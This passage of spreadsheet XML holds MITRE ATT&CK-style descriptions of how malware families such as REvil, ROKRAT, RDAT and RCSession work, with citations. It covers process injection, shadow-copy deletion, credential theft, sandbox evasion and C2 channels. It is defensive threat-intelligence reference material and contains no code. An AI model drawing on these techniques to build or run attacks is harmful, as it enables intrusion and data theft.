  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses HTTP/HTTPS for command and control communication.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses cmd.exe to execute commands.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses WMI to perform process monitoring.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can bypass UAC to escalate privileges.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can be installed via DLL side-loading.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can collect data from a compromised host.(Citation: Profero APT27 December 2020)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can use an encrypted beacon to check in with C2.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can remove files from a targeted system.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has the ability to drop additional files to an infected machine.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has the ability to capture keystrokes on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has used a file named English.rtf to appear benign on victim hosts.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can write its configuration file to the Registry.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has the ability to execute inside the msiexec.exe process.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can use WinSock API for communication including &lt;code&gt;WSASend&lt;/code&gt; and &lt;code&gt;WSARecv&lt;/code&gt;.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has the ability to use TCP and UDP in C2 communications.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can compress and obfuscate its strings to evade detection on a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can identify processes based on PID.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can launch itself from a hollowed svchost.exe process.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has the ability to modify a Registry Run key to establish persistence.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can capture screenshots from a compromised host.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can gather system information from a compromised host.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can gather system owner information, including user and administrator privileges.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can use HTTP in C2 communications.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can use `cmd.exe` for execution on compromised hosts.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) has used DNS to communicate with the C2.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. [RDAT](https://attack.mitre.org/software/S0495) can also download data from the C2 which is split into 81,920-byte portions.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) has used HTTP if DNS C2 communications were not functioning.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can issue SOAP requests to delete already processed C2 emails. [RDAT](https://attack.mitre.org/software/S0495) can also delete itself from the infected system.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can download files via DNS.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can use email attachments for C2 communications.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used Windows Video Service as a name for malicious services.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) has masqueraded as VMware.exe.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via subdomains that utilize base64 with character substitutions.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can take a screenshot on the infected system.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via base32-encoded subdomains.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can process steganographic images attached to email messages to send and receive C2 commands. [RDAT](https://attack.mitre.org/software/S0495) can also embed additional messages within BMP images to communicate with the [RDAT](https://attack.mitre.org/software/S0495) operator.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can also embed data within a BMP image prior to exfiltration.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used AES ciphertext to encode C2 communications.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) has executed commands using &lt;code&gt;cmd.exe /c&lt;/code&gt;.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) has created a service when it is installed on the victim machine.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) hooks several Win32 API functions to hijack elements of the remote system management user-interface.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) has the capability of deleting local files.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) has used several Win32 API functions to interact with the victim machine.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has encrypted C2 communications with the ECIES algorithm.(Citation: Kaspersky Sodin July 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can launch an instance of itself with administrative rights using runas.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has the capability to destroy files and folders.(Citation: Kaspersky Sodin July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can encrypt files on victim systems and demands a ransom to decrypt the files.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee REvil October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can decode encrypted strings to enable execution of commands and payloads.(Citation: G Data Sodinokibi June 2019)(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can connect to and disable the Symantec server on the victim's network.(Citation: Cylance Sodinokibi July 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can identify the domain membership of a compromised host.(Citation: Kaspersky Sodin July 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has infected victim machines through compromised websites and exploit kits.(Citation: Secureworks REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks GandCrab and REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can exfiltrate host and malware information to C2 servers.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can mark its binary code for deletion after reboot.(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has the ability to identify specific files and directories that are not to be encrypted.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can download a copy of itself from an attacker controlled IP address to the victim machine.(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use vssadmin to delete volume shadow copies and bcdedit to disable recovery features.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has been executed via malicious MS Word e-mail attachments.(Citation: G Data Sodinokibi June 2019)(Citation: McAfee REvil October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can mimic the names of known executables.(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can save encryption parameters and system information to the Registry.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use Native API for execution and to retrieve active services.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used encrypted strings and configuration files.(Citation: G Data Sodinokibi June 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used PowerShell to delete volume shadow copies and download files.(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can inject itself into running processes on a compromised host.(Citation: McAfee REvil October 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can query the Registry to get random file extensions to append to encrypted files.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can force a reboot in safe mode with networking.(Citation: BleepingComputer REvil 2021)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has the capability to stop services and kill processes.(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has been distributed via malicious e-mail attachments including MS Word Documents.(Citation: G Data Sodinokibi June 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[REvil](https://attack.mitre.org/software/S0496) can check the system language using &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt; and &lt;code&gt;GetSystemDefaultUILanguage&lt;/code&gt;. If the language is found in the list, the process terminates.(Citation: Kaspersky Sodin July 2019)
</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can enumerate active services.(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can obtain the token from the user that launched the explorer.exe process to avoid affecting the desktop of the SYSTEM user.(Citation: McAfee Sodinokibi October 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used obfuscated VBA macros for execution.(Citation: G Data Sodinokibi June 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used HTTP and HTTPS in communication with C2.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use the Windows command line to delete volume shadow copies and disable recovery.(Citation: Cylance Sodinokibi July 2019)(Citation: Talos Sodinokibi April 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use WMI to monitor for and kill specific processes listed in its configuration file.(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Group IB Ransomware May 2020)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) encrypts files with XOR before sending them back to the C2 server.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) decodes Base64 strings and decrypts strings using a custom XOR algorithm.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) establishes persistence on webservers as an IIS module.(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uploads and downloads files to and from the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) executes the &lt;code&gt;whoami&lt;/code&gt; on the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uses HTTP for C2 communications.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uses cmd.exe to execute commands on the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used the [RIPTIDE](https://attack.mitre.org/software/S0003) RAT, which communicates over HTTP with a payload encrypted with RC4.(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used [RIPTIDE](https://attack.mitre.org/software/S0003), a RAT that uses HTTP to communicate.(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>[ROADTools](https://attack.mitre.org/software/S0684) automatically gathers data from Azure AD environments using the Azure Graph API.(Citation: Roadtools)</t>
  </si>
  <si>
    <t>[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD users.(Citation: Roadtools)</t>
  </si>
  <si>
    <t xml:space="preserve">[ROADTools](https://attack.mitre.org/software/S0684) leverages valid cloud credentials to perform enumeration operations using the internal Azure AD Graph API.(Citation: Roadtools)	</t>
  </si>
  <si>
    <t xml:space="preserve">[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD groups.(Citation: Roadtools)	</t>
  </si>
  <si>
    <t xml:space="preserve">[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD applications and service principals.(Citation: Roadtools)	</t>
  </si>
  <si>
    <t>[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD systems and devices.(Citation: Roadtools)</t>
  </si>
  <si>
    <t>[ROCKBOOT](https://attack.mitre.org/software/S0112) is a Master Boot Record (MBR) bootkit that uses the MBR to establish persistence.(Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can use  the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing.(Citation: Talos ROKRAT)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has an audio capture and eavesdropping module.(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has used legitimate social networking sites and cloud platforms (including but not limited to Twitter, Yandex, Dropbox, and Mediafire) for C2 communications.(Citation: Talos ROKRAT)(Citation: Securelist ScarCruft May 2019)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can extract clipboard data from a compromised host.(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can steal credentials stored in Web browsers by querying the sqlite database.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can collect host data and specific file types.(Citation: NCCGroup RokRat Nov 2018)(Citation: Volexity InkySquid RokRAT August 2021)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can check for debugging tools.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can decrypt strings using the victim's hostname as the key.(Citation: Volexity InkySquid RokRAT August 2021)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) relies on a specific victim hostname to execute and decrypt important strings.(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can send collected files back over same C2 channel.(Citation: Talos ROKRAT)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can send collected data to cloud storage services such as PCloud.(Citation: Malwarebytes RokRAT VBA January 2021)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[ROKRAT](https://attack.mitre.org/software/S0240) can request to delete files.(Citation: NCCGroup RokRat Nov 2018)	</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has the ability to gather a list of files and directories on the infected system.(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can retrieve additional malicious payloads from its C2 server.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)(Citation: Volexity InkySquid RokRAT August 2021)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can use  `SetWindowsHookEx` and `GetKeyNameText` to capture keystrokes.(Citation: Talos ROKRAT)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can modify the `HKEY_CURRENT_USER\Software\Microsoft\Office\` registry key so it can bypass the VB object model (VBOM) on a compromised host.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can use a variety of API calls to execute shellcode.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can encrypt data prior to exfiltration by using an RSA public key.(Citation: Volexity InkySquid RokRAT August 2021)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can list the current running processes on the system.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can access the &lt;code&gt;HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData&lt;/code&gt; Registry key to obtain the System manufacturer value to identify the machine type.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can capture screenshots of the infected system using the `gdi32` library.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can check for VMware-related files and DLLs related to sandboxes.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can gather the hostname and the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)(Citation: Volexity InkySquid RokRAT August 2021)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can collect the username from a compromised host.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has used Visual Basic for execution.(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can use HTTP and HTTPS for command and control communication.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can steal credentials by leveraging the Windows Vault mechanism.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has the ability to remove Registry entries that it created for persistence.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) collects data from the clipboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) samples have been signed with a code-signing certificates.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has used an RSS feed on Livejournal to update a list of encrypted C2 server names. [RTM](https://attack.mitre.org/software/S0148) has also hidden [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.(Citation: ESET RTM Feb 2017)(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has resolved [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain.(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can delete all files created during its execution.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can check for specific files and directories associated with virtualization and malware analysis.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can download additional files.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can add a certificate to the Windows store.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can record keystrokes from both the keyboard and virtual keyboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has named the scheduled task it creates "Windows Update".(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[RTM](https://attack.mitre.org/software/S0148) has been delivered as archived Windows executable files masquerading as PDF documents.(Citation: Unit42 Redaman January 2019)	</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can delete all Registry entries created during its execution.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
